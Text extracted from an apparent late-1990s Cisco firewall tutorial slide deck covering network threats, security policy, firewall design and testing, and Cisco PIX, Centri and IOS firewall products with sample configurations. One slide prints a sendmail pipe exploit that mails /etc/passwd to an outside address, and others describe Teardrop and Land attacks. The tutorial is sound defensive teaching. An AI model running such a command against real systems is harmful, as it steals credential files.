Internet Firewall Technology Tutorial

0999_03F8_c2 NW98_US_407

Agenda
Motivation
Threats and Attacks
Business Need

Design and Test Principles

Policy Architecture

Design Implementation
Cisco Solutions
0999_03F8_c2 NW98_US_407

Motivation: Security Threats and Common Network Attacks

0999_03F8_c2 NW98_US_407

Security Threats
telnet foo.bar.org username: dan password:
m-y-p-a-s-s-w-o-r-d d-a-n

Im Bob, Send Me all Corporate Correspondence with Cisco Bob

Loss of Privacy

Impersonation
Deposit $1000 Deposit $100

CPU

Customer

Bank

Denial of Service

Loss of Integrity

0999_03F8_c2 NW98_US_407

Exploit Host Weaknesses

10.1.1.1
Good Bye

0999_03F8_c2 NW98_US_407

Common Attacks
Routing attacks
Wiretapping

Active content
ICMP attacks

Denial of service attacks

TCP sequence attacks
0999_03F8_c2 NW98_US_407

Send Mail Attacks

Grabbing the/etc/password file Injecting a file or running a script
mail from: "|/bin/mail me@myhost.com < /etc/passwd" 250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok rcpt to: mickeymouse 550 mickeymouse... User unknown data 354 Enter mail, end with "." on a line by itself 250 Mail accepted

quit

0999_03F8_c2 NW98_US_407

Password Cracking

Features: graphical brute forcing, cracking NT passwords, network session

0999_03F8_c2 NW98_US_407

Newer Internet Attacks

Teardrop 1
A fragmentation attack that works by exploiting a reassembly bug with overlapping fragments, and causes the targeted system to crash or hang

Teardrop 2
The first fragment starts at offset 0 and the second fragment is within the TCP header

Land
Takes a SYN packet with source address and port are the same as the destination
0999_03F8_c2 NW98_US_407

Other Items
SNMP v1 strings CERT advisories X11, RPC, NIS, NFS, NTP, finger UDP high ports

TCP high ports

0999_03F8_c2 NW98_US_407

10

Service Configuration
no service finger no service pad no service tcp-small-servers no service udp-small-servers no ip bootp server no ip source-route service password-encryption enable secret YellowMegaMan no enable password no ip redirect no ip directed-broadcast no ip proxy-arp
0999_03F8_c2 NW98_US_407

11

Motivation: Business Need

0999_03F8_c2 NW98_US_407

12

Traditional Business
Employees Customers

Partners

Enterprise

Suppliers

0999_03F8_c2 NW98_US_407

13

The Need to Be Networked

A new model of information technology
Being connected is not enough, electronic commerce is not enough You need to be networked to all your important constituencies

Open up internal operational systems and information to prospects, customers, partners, suppliers, and employees
0999_03F8_c2 NW98_US_407

14

The Global Networked Business

Employees Customers

Partners

Enterprise

Suppliers

0999_03F8_c2 NW98_US_407

15

Design: Policy

0999_03F8_c2 NW98_US_407

16

What Are the Business Problems You are Trying to Solve?

VPN and Extranets

Internet Business Need

Internet Access

Networked Commerce

Internet Presence

Security Considerations
0999_03F8_c2 NW98_US_407

17

What Are their Risks?

R: Risk S: Safeguard T: Threat V: Value W: Weakness RSF: Risk-Safeguard Factor RVF: Risk-Value Factor STF: Safeguard-Threat Factor SVF: Safeguard-Value Factor VTF: Value-Threat Factor WTF: Weakness-Threat Factor

VTF SVF

+
V

RSF R +

WTF

+ +
T

+
RVF

STF
0999_03F8_c2 NW98_US_407

18

Simplified Causal Diagram

Threat: Weakness: Safeguard: Value: Assurance: Hazards facing the information (attacks/time) Vulnerability of the processing ($/attack) Methods of protection ($/time) Dollar value of information ($) Confidence factor ($/time)
Weakness

Threat

+
Risk

Value

+ Safeguard
0999_03F8_c2 NW98_US_407

Assurance

19

Internet Access

Internet

Applications
Web access and e-mail (using an external mail server) Streaming audio/video

Security issues
Protection of internal resources from outsiders Limiting external privileges of internal users Visibility of internal network addresses Auditing usage and possible attacks
0999_03F8_c2 NW98_US_407

20

Internet Presence
E-Mail WWW

Internet Additional applications

E-mail server managed locally Web server

Additional security issues

Protection of public resources Separation of public and internal networks Authentication of remote users
0999_03F8_c2 NW98_US_407

21

Networked Commerce
Commerce Gateways

Internet
Internal Business Systems

Additional applications
Electronic commerce with controlled access to business systems for ordering, etc.

Additional security issues

Secure gateway-internal communication Client-commerce gateway encryption Strong application authentication of client
22

0999_03F8_c2 NW98_US_407

VPN and Extranets

Extranet Partner Mobile and Home Users

Remote Site

Internet
HQ

Additional applications
Private connections over public network Virtual Private Network (VPN)

Additional security issues

Encryption between remote users/sites and HQ Very strong network authentication of client
0999_03F8_c2 NW98_US_407

23

Design: Architecture

0999_03F8_c2 NW98_US_407

24

What Is a Firewall?

I think it was Pope Urban that first attempted a definition in 1094. He enforced his definition in 1095-1099. Zangi, the Prince of Mosul refuted it in 1144 and Saladin was left to stave off Pope Eugenius III and St. Bernard between 1146 and 1148. And, as everyone knows, Richard the Lion Hearted debated the definition with Saladin between 1189 and 1192 without a resolution. All of this is to say that this can become a religious issue and many deaths will occur from it.
Chris Lonvick
0999_03F8_c2 NW98_US_407

25

Security Technology Taxonomy

UNIVERSAL PASSPORT

Identity
Accurately identify network users and their privileges

USA

Integrity
UNIVERSAL PASSPORT

Network integrity through: Secure network perimeters Privacy and encryption Reliable operation

USA

Active Audit
Provide auditing, accounting and active detection and response

UNIVERSAL PASSPORT

0999_03F8_c2 NW98_US_407

26

Firewall Design CriteriaOne

Where is your policy? Implement it

Hosts offering public services/access are not secure Internal network hosts should not offer public services/access Private networks and hosts should not be visible
0999_03F8_c2 NW98_US_407

27

Firewall Design CriteriaTwo

Know your network
Security for multiple Internet access points
Management and operation comfort

Network security cannot replace data security Detailed security and usage accounting
0999_03F8_c2 NW98_US_407

28

Firewall Design CriteriaThree

A robust firewall is typically not one device
Layered topology; defense in depth Redundancy and failover

Response plan

0999_03F8_c2 NW98_US_407

29

Internet Access Firewall Topology

Outside

Reasonable features and performance at a low cost

Usually a router with firewall capabilities
0999_03F8_c2 NW98_US_407

30

Internet Presence Firewall Topology

Outside
Public Access Server

Demilitarized Zones (DMZs)

Public Access Server

Dedicated firewall platforms

Multiple interfaces/layers Many features, high performance
0999_03F8_c2 NW98_US_407

31

Lock-and-Key
Situation: you want a subset of hosts on a network to access a host on a remote network protected by a firewall With lock-and-key access, you can enable only a desired set of hosts to gain access by having them authenticate through a TACACS+ server
0999_03F8_c2 NW98_US_407

32

Lock-and-Key Configuration
aaa authentication login lockkey tacacs+ enable access-list 101 dynamic telecommuter timeout 5 permit ip any any access-list 101 permit tcp any 10.1.1.1 eq 23 interface e0 ip address 10.1.1.1 255.255.255.0 ip access-group 101 in

tacacs-server host 1.1.1.1 tacacs-server key cisco

line vty 0 4 password 7 telecommuter login authentication lockkey autocommand access-enable timeout 2
0999_03F8_c2 NW98_US_407

33

Networked Commerce
Web

Outside

Encrypted Transaction

Coupled gateway and application servers

Encryption and authentication

0999_03F8_c2 NW98_US_407

34

VPNs and Extranets

Strong encryption, authentication

Routers, firewalls, end systems
0999_03F8_c2 NW98_US_407

35

IPSec: Standard for VPN Encryption

Internet
Encrypted IP

Internal Network

Standards compliance
IPSec AH/ESP encapsulated tunnels IKE key management

Fully interoperable
Cisco IOS , Firewalls, and other IPSec-compliant systems

Client support
Windows 95 and Windows NT 4.x (Cisco provided software) Windows NT 5.0 (Microsoft/Cisco partnership)
0999_03F8_c2 NW98_US_407

36

IPSec Modes
IP HDR Tunnel Mode Data

New IP HDR IPsec HDR

IP HDR

Data
May Be Encrypted

IP HDR

Data

Transport Mode
IP HDR IPsec HDR Data
May Be Encrypted

0999_03F8_c2 NW98_US_407

37

Virtual Private Network Example

128.49.48.1 128.49.54.1

Clear

Encrypted

Clear

0999_03F8_c2 NW98_US_407

38

VPN Configuration
crypto ipsec transform-set first ah-md5-hmac mode tunnel crypto ipsec transform-set second ah-sha-hmac esp-des mode tunnel ! crypto isakmp policy 5 auth rsa-encr hash md5 lifetime 3600 ! crypto map toBob 10 ipsec-isakmp set peer 128.49.54.1 set transform-set first second match address 155 ! interface e0 ip address 128.49.48.1 255.255.255.0 crypto map toBob ! access-list 155 permit ip 128.49.48.1 0.0.0.255 128.49.54.1 0.0.0.255

Define IPsec policy: Two transform sets providing encryption and authentication Set IKE policy

Create a crypto map define negotiating peer prioritize IPsec policy match an access list Configure interface, assign crypto map Define access-list to encrypt all traffic

0999_03F8_c2 NW98_US_407

39

Design: Test

0999_03F8_c2 NW98_US_407

40

Firewall Test CriteriaOne

Where is your policy?
Who controls routers? Who controls firewalls? Who makes up the security team?

Check policy and well-known holes

Scan the network Test the firewall and the services behind it

Use verification and IDS tools

0999_03F8_c2 NW98_US_407

41

Firewall Test CriteriaTwo

Do things work as expected?
Scan firewall Scan DMZ and services

Scan internal network

Invert policy rules on sniffer

Log and document everything

0999_03F8_c2 NW98_US_407

42

Logging
service timestamps debug datetime msec service timestamps log datetime msec

logging buffered 16384 logging trap debugging logging 169.222.32.1 logging source-interface loopback0
access-list 101 permit tcp any 10.1.1.1 eq 23 logging ip ftp source-interface loopback0 ip ftp username c7200 ip ftp password 7 8675309G exception protocol ftp exception dump 10.1.1.1
0999_03F8_c2 NW98_US_407

43

Firewall Test CriteriaThree

Testing never ends
Know your network

Review logs
Educate staff and users

Keep revisions up to date

0999_03F8_c2 NW98_US_407

44

Implementation: Cisco Solutions

0999_03F8_c2 NW98_US_407

45

Cisco Firewall Product Line

Feature Set

PIX Firewall

Centri Firewall for Windows NT Cisco 1600/2500 with Cisco IOS FW Features

Performance
0999_03F8_c2 NW98_US_407

46

Supported Applications
Telnet, Web, FTP, and SMTP
RealAudio, RealVideo, and VDOLive

Lotus Notes, IMAP, and LDAP

DNS resolves and zone transfers RPC, R-Commands Other generic IP, TCP, and UDP
0999_03F8_c2 NW98_US_407

47

Content Filtering
Blocks Java, ActiveX, JavaScript and VBscript

URL logging and blocking

SMTP command filtering
Block SMTP commands Block excess routing characters

0999_03F8_c2 NW98_US_407

48

Java Blocking
HTTP Request
N

Web Client

Inspect Server Reply Inspect Port Command No Java Signature Lets it Through Requests for Java Applet Java Signature Drops the Packet

Web Server

0999_03F8_c2 NW98_US_407

49

Attack Detection and Prevention

Events

Monitors the following statistics and conditions:

Total embryonic connections

Per minute incoming new connection rate

Timer for TCP connections to reach established state Packet count for duplicate syn packets

Packet sequence numbers

0999_03F8_c2 NW98_US_407

50

Alerts
Non-statistical events may trigger alerts Alerts set on groups of events or specific ones
DoS attacks, SMTP command attacks, or denied Java applet

Alerts are visual, email, and pager Thresholds limit the number of alerts issues when repeating in a given timeframe

Email is based on MAPI (install Messaging)

Beeper is based on TAPI

0999_03F8_c2 NW98_US_407

51

Adaptive Security Algorithm (ASA)

Provides stateful connection policy Connections allowed outallows return session backflow; incoming connections must be explicitly enabled

Initial TCP sequence number randomized

Tracks source and destination ports + addresses, TCP sequences, and additional TCP flags Access control list (ACL) policy support UDP + TCP session state
TCPFIN bit UDPOne minute default timer (except for DNS)
0999_03F8_c2 NW98_US_407

53

TCP ConnectionsInside to Outside Initialization Phase

Sender
IP Checksum Source IP Address Destination IP Address Source Port Destination Port Sequence Number Acknowledge Checksum Code
7363 10.0.0.14 171.68.10.2 4005 23 100 4512 Sync Data

PIX
PIX Checks if a Translation Exists or Not. If Not it Creates One Upon Verifying NAT, Global, Access Control and Authentication, if Any a Connection Is Also Created
6514 171.69.236.5 171.68.10.2 4005 23 3050 3124 Sync

Receiver and Responder

3214 171.68.10.2 171.69.236.5 23 4005 31 IP 3151 Spoofing 4321

TCP

4321 171.68.10.2 10.0.0.14 23 4005 Connection 31

PIX follows adaptive security algorithm (Src IP, src port, dest IP, dest port) check Sequence number check Translation check If the packet code bit was not syn-ack, packet would have been dropped and logged
54

Back Spoofing

Assume data length = 100 octets; Checksum is modified not recalculated

0999_03F8_c2 NW98_US_407

201 Sync-Ack 2143

TCP ConnectionsInside to Outside Data Transfer

Sender
Checksum Source IP Address Destination IP Address Source Port Destination Port Sequence Number Acknowledge Checksum Code
4512 10.0.0.14 171.68.10.2 4005 23 201 132 3412 ACK Data

PIX
3912 171.69.236.5 171.68.10.2 Since ACK Bit is 4005 Set, Connection and 23 Translation Entries 3151 Should Exist 132 1234 ACK 3111 171.68.10.2 10.0.0.16 23 4005 132 233 3311 ACK

Receiver and Responder

2216 171.68.10.2 171.69.236.5 23 4005 132 3252 2222 ACK

ASA Checks Again

0999_03F8_c2 NW98_US_407

55

TCP ConnectionsInside to Outside Termination Phase

Sender
1111 Checksum Source IP Address 10.0.0.14 Destination IP Address 171.68.10.2 4005 Source Port 23 Destination Port 1000 Sequence Number 8000 Acknowledge 2222 Checksum FIN Code Data 1111 171.68.10.2 10.0.0.14 23 4005 800

PIX
2222 171.69.236.5 171.68.10.2 4005 23 3950 800 2222 FIN

Receiver and Responder

4512 171.68.10.2 171.69.236.5 23 4005 800 4051 2121 FIN-ACK

Back Spoofing

Assume data length = 100 octets; Checksum is modified not recalculated

0999_03F8_c2 NW98_US_407

1101 1111 FIN-ACK

PIX will only accept a packet with code-bit FIN-ACK All other packets dropped Any packet after this packet would also be dropped Connection released immediately Translation released after x-late time out

56

Static vs. Conduit

Static
A static maps a global (outside) address to an inside (local) address. Any access to the global goes to the mapped inside address. This gives an inside machine with an illegal address a presence on the outside with a legal address. A static is secure (protected).

Conduit:
A conduit is a hole through the firewall allowing outside machines to initiate connections to inside machines. It is related to a static in that a static maps a global address to a local machine. Conduits are only as secure as you make them. They are used for service items.
0999_03F8_c2 NW98_US_407

57

Authorization
Telnet

Internet
Internet Joe DMZ DNS/Mail PIX Firewall Joe

User Profile
id=Joe Fail=0 Service=Shell Cmd=Telnet{ Permit Host A} Cmd=FTP{ Permit Host B}

Intranet

Cisco Secure Inside Host A

0999_03F8_c2 NW98_US_407

58

SYN Flood Defender

Throttles both internal and external maximum sessions
Inboundcontrols SYN flooding (denial of service) Outboundlimits maximum sessions (controls applications such as Microsofts Internet Explorer)

Protects session resources from being depleted Maintains high network reliability
0999_03F8_c2 NW98_US_407

59

SYN Floods

Trying to KILL Mail Server

Internet
SMTP

Mail Allowed Server Allowed

PIX Limit 2 Syn Syn Syn Syn Stopped Inside Outside

All Allowed Commands

0999_03F8_c2 NW98_US_407

60

Content Filter

Trying to Get INFO

Internet
SMTP

Mail Server

NOOP

Debug
OK

Inside

Outside

All Allowed Commands

0999_03F8_c2 NW98_US_407

61

Client VPNPIX Ravlin IPSec

Internet
Encrypted IP

Internal Network

Standards compliance
IPSec AH/ESP encapsulated tunnel IKE key management

Wire-speed performance
Ethernet now Fast Ethernet late CY 98

Fully interoperable
Cisco IOS and other IPSec-compliant systems
0999_03F8_c2 NW98_US_407

62

PIX with OTP Configuration

Configuration on the PIX manager:
Go to PIX manager: username = pixadmin URL= 10.0.0.0.100:8080 password = cisco

On PIX manager: Click authentication Select TACACS+ server Click add Server IP address = 10.0.0.100 Encryption key: spackle Click OK
On PIX manager: Select authentication Select authenticate all internal hosts or whatever is desired. Assume pin = 1234 Passcode = 5551212
0999_03F8_c2 NW98_US_407

Click add

Click OK. Click save.

63

PIX with OTP Session

Telnet prompt:
Username: megaman Enter passcode: 5551212

FTP prompt:
Connected to 172.16.50.87

220FTP authentication 220

User (172.16.50.87:<none>>: 331Enter PASSCODE: 331

HTTP prompt: (Internet Explorer)

You need a password to access this page Resource Username Password HTTP authentication megaman 5551212

Password:
230220 TS09B6F FTP server (version Cisco Micro WebServer) ready
331Hello root, send password 230Login user root OK 230

HTTP prompt: (Netscape)

Username and password required Enter username for HTTP authentication at 172.16.50.87 User name Password
0999_03F8_c2 NW98_US_407

megaman 5551212
64

PIX with Three Interfaces

A web server for the inside network. Access allowed only from 172.28.0.0 and 172.16.50.0
192.168.0.1 10.0.0.3

Internet
Public Network

Perimeter Network
FTP Server 192.168.0.3 WebServer 192.168.0.2

Private Network

10.0.0.100
0999_03F8_c2 NW98_US_407

65

PIX with Three Interfaces

nameif ethernet0 outside security0 nameif ethernet1 inside security100 nameif ethernet2 dmz security50 enable password 8Ry2YjIyt7RRXU24 encrypted passwd 2KFQnbNIdI.2KYOU encrypted hostname pixfirewall failover names name 192.168.0.2 webserver name 192.168.0.3 ftpserver pager lines 24 syslog output 20.3 no syslog console interface ethernet0 auto interface ethernet1 auto interface ethernet2 auto ip address outside 172.16.50.3 255.255.255.0 ip address inside 10.0.0.3 255.0.0.0 ip address dmz 172.168.0.1 255.255.255.0 arp timeout 14400 global (outside) 1 172.16.50.76-172.16.50.85 global (dmz) 1 192.168.0.90-192.168.0.99 nat (inside) 1 10.0.0.0 255.0.0.0 nat (dmz) 1 192.168.0.0 255.255.255.0 static (dmz,outside) 172.16.50.76 webserver 200 200 static (dmz,outside) 172.16.50.77 ftpserver
0999_03F8_c2 NW98_US_407

66

PIX with Three Interfaces

static (inside,outside) 172.16.50.80 10.0.0.110 conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0 conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0 conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0 conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0 conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0 conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0 age 10 rip outside passive no rip outside default rip inside passive rip inside default no rip dmz passive rip dmz default route outside 0.0.0.0 0.0.0.0 172.16.50.1 1 timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00 timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00 tacacs-server host 10.0.0.100 abc aaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+ no snmp-server location no snmp-server contact snmp-server community public telnet 10.0.0.100 255.255.255.255 mtu outside 1500 mtu inside 1500 mtu dmz 1500 : end
67

0999_03F8_c2 NW98_US_407

Centri Firewall
Windows NT Firewall ICSA certified Version 4.0.2 now shipping! Evaluation software on the web at: http://www.cisco.com/centri

0999_03F8_c2 NW98_US_407

68

Ease of Use

Installation Wizard
Steps through initial configuration Predefined security policies

Graphical policy manager

Drag-and-drop security policies

Secure remote administration

0999_03F8_c2 NW98_US_407

69

Secure Remote Administration

Internet Private Network ISP Network

Private Network

Secure remote admin

MS authenticated RPC Centris asymmetric authentication

Private Network

From trusted or untrusted sides

0999_03F8_c2 NW98_US_407

70

Reporting
Reports may be run on demand and scheduled to run at fixed times (e.g. Mondays at 2 a.m.) Reports are presented in HTML or Text and may be stored on the web server in the product (examiner) or sent to an e-mail address To view reports it is simple to use the imbedded browser in Centri though you may use another browser if desired (port 8080no authentication)

There are three types of reports:

Warning (security issues and product oddities) Service (statistical details per service, no aggregates) Connection (polls for open connections per service, no aggregates)

0999_03F8_c2 NW98_US_407

71

Flexible Security Policies

161.44.75.12 By IP Address Restrictive Open Security Policy Closed By NT Username

By Time of Day

By Application

0999_03F8_c2 NW98_US_407

72

Centri Firewall Architecture

Kernel Proxies
Implemented in Windows NT Kernel
Custom TCP/IP stack Packet-filtering speed Proxy functionality Protects against common vulnerabilities in Windows NT (WinNuke, NetBIOS holes, etc.)
Internet

Intercept architecture
Preservation of original network stack Firewall communication is also protected Capability of running servers on the firewall
0999_03F8_c2 NW98_US_407

73

Centri Firewall Design

Application Layer
Content Filtering Authentication Other Services 3rd-Party Apps
(DNS, Web, E-mail)

NT Kernel

Kernel Proxy

Microsoft TCP/IP Stack

Virtual Interface 10.0.0.2

Device Driver

Outside Interface
192.204.18.2

Inside Interface
10.0.0.1

0999_03F8_c2 NW98_US_407

74

Kernel ProxySample Inbound Data Flow

Centri Agents (e.g., Authentication)
Winsock Applications (e.g., Web, DNS, MailServers)

Winsock

Application Space Kernel Space

Local Communication Channel

External Protocol Stack

Internal Protocol Stack

Security Verification Engine Interceptor

Native Microsoft NT TCP/IP Stack

Untrusted Network Adapter

Trusted Network Adapter

Centri Virtual Adapter

205.50.50.2

10.0.0.1

10.0.0.2 Trusted Server

0999_03F8_c2 NW98_US_407

75

Kernel ProxySample Native Stack Data Flow

Centri Agents (e.g., Authentication)
Winsock Applications (e.g., Web, DNS, MailServers)

Winsock

Application Space Kernel Space

Local Communication Channel

External Protocol Stack

Internal Protocol Stack

Security Verification Engine Interceptor

Native Microsoft NT TCP/IP Stack

Untrusted Network Adapter

Trusted Network Adapter

Centri Virtual Adapter

205.50.50.2

10.0.0.1

10.0.0.2

0999_03F8_c2 NW98_US_407

76

Site-Based Model
Policy enforcement occurs when information passes between sites (intersite), not within the same site (intrasite) Rules are checked when information leaves one site for another
Policy Rules Checked

Trusted

Internet

Install creates two sites trusted and Internetwhich may be expanded upon post-install (e.g. adding an isolated service network [DMZ]) The local stack is tied by a virtual wire to a trusted site
0999_03F8_c2 NW98_US_407

Isolated Service Network

77

Eight Kernel Proxies

IP
Source/destination checks Ping- of-death prevention IP spoof prevention

FTP
Inline user authentication Non-transparent proxy mode Allowed action checks

ICMP
Message type

Telnet
Inline user authentication Non-transparent proxy mode Port check

TCP
Port check SYN flood prevention

HTTP
Inline user authentication URL filtering Java/ActiveX/Java Script Blocking Allowed action checks

UDP
Port check

SMTP
Nested routing blocking Minimal protocol set Similar to Mail Guard
0999_03F8_c2 NW98_US_407

78

Centri Summary
High-performance Kernel Proxy firewall
Uses four breakthroughs in firewall user interface design:
Natural network views
Bundled applications Policy builder

Drag-and-drop policy deployment

Integrates well into Microsoft environment Policies based on NT domains, groups, and users
0999_03F8_c2 NW98_US_407

79

Cisco IOS
Integrated security is not a new concept Existing Cisco IOS security technologies support:
Perimeter security and access control Identification and user authentication Denial of service (DoS) protection Virtual private networking Reporting
0999_03F8_c2 NW98_US_407

80

Existing Cisco IOS Perimeter Security Technologies

Access control lists Network address translation (NAT) VPN technologies
Authentication Network-layer encryption Tunneling (GRE, L2F) Peer router

Policy-based multi-interface support Event logging TACACS+/RADIUS authentication Lock-and-key security

0999_03F8_c2 NW98_US_407

81

Cisco IOS Firewall Feature Set

Enhanced Security for the Intelligent Internet
Context-Based Access Control (CBAC)
Secure, per-application filtering Support for advanced protocols (H.323, SQLnet, RealAudio, etc.)

0999_03F8_c2 NW98_US_407

Control downloading of Java applets Denial of service detection and prevention Real-time alerts TCP/UDP transaction log Configuration and management
82

Benefits...
Integrated solutionaccess and security No new hardware requiredone box to manage Full routing functionality

Applicable for Internet, intranet and extranet security

Full Cisco IOS software interoperability: customers can leverage their knowledge of Cisco IOS software

Low cost of implementation and ownership for Cisco-installed base

0999_03F8_c2 NW98_US_407

83

Context-Based Access Control (CBAC)

Tracks state and context of network connections to secure traffic flow Inspects data coming into or leaving router Allows connections to be established by temporarily opening ports based on payload inspection Return packets authorized for particular connection only via temporary ACL
0999_03F8_c2 NW98_US_407

84

Context-Based Access Control (CBAC) Application Support

Transparent support for common TCP/UDP Internet services, including WWW, Telnet, SNMP, finger, etc. FTP TFTP Multimedia applications:
VDOnets VDO Live RealNetworks RealAudio Intels InternetVideo Phone (H.323) Microsofts NetMeeting (H.323) Xing Technologies Streamworks Whitepines CuSeeMe

SMTP
Java blocking BSD R-cmds

Oracle SQL Net

Remote-procedure call (RPC)
0999_03F8_c2 NW98_US_407

85

IOS Firewall Transaction Log

Provides audit trail for tracking transactions
Recognition of session and port Information is sortable via tag Sample:
Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes responder (172.166.129.11:25) sent 208 bytes Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes responder (172.166.129.11:25) sent 325 bytes

0999_03F8_c2 NW98_US_407

86

Sample Configuration
ip inspect name pri-net tcp ip inspect name pri-net udp ip inspect name pri-net ftp ip inspect name pri-net h323 ip inspect name pri-net realaudio ip inspect name pri-net streamworks ip inspect name pri-net vdolive ip inspect name pri-net cuseeme ip inspect name pri-net http java-list 10 interface e0 ip inspect pri-net in ip access-group 101 out access-list 10 permit 172.34.7.130 access-list 101 deny ip any any
0999_03F8_c2 NW98_US_407

87

CFMI
Common security management for enterprise infrastructure

Centralized visual policy development, management, and enforcement

Adaptive configuration of network infrastructure Integrate existing and future authentication technologies and Cisco firewall technologies

Support for scalable configuration of IPSEC and IKE technologies

Physical network representation
0999_03F8_c2 NW98_US_407

88

Ciscos Firewall Family

Cisco IOS Firewall feature set
Advanced, rich security option for Cisco IOS software, with full routing and WAN access capabilities, that integrates seamlessly with existing Cisco IOS software-based environments

Centri Firewall
High-performance, flexible, Windows NT-based security software with intuitive user-based policy rules. Easy to install, configure, and manage

PIX Firewall
Highest-performance, scalable, dedicated security appliance with most advanced features and application support, fault tolerance
0999_03F8_c2 NW98_US_407

89

References
www.cisco.com/univercd/cc/td/doc/product/ software/ios112/112cg_cr/2cbook/2cacclst.htm
Describes access lists and lock and key

www.cisco.com/warp/public/701/31.html
Increasing security on IP networks

www.cisco.com/warp/public/707/4.html
Strategies to protect against TCP SYN DoS attacks

www.cisco.com/univercd/cc/td/doc/product/ software/ios113ed/113t/113t_3/firewall.htm
Cisco IOS Firewall feature set docs

www.cisco.com/warp/public/458/41.html
NAT FAQ
0999_03F8_c2 NW98_US_407

90

0999_03F8_c2 NW98_US_407

91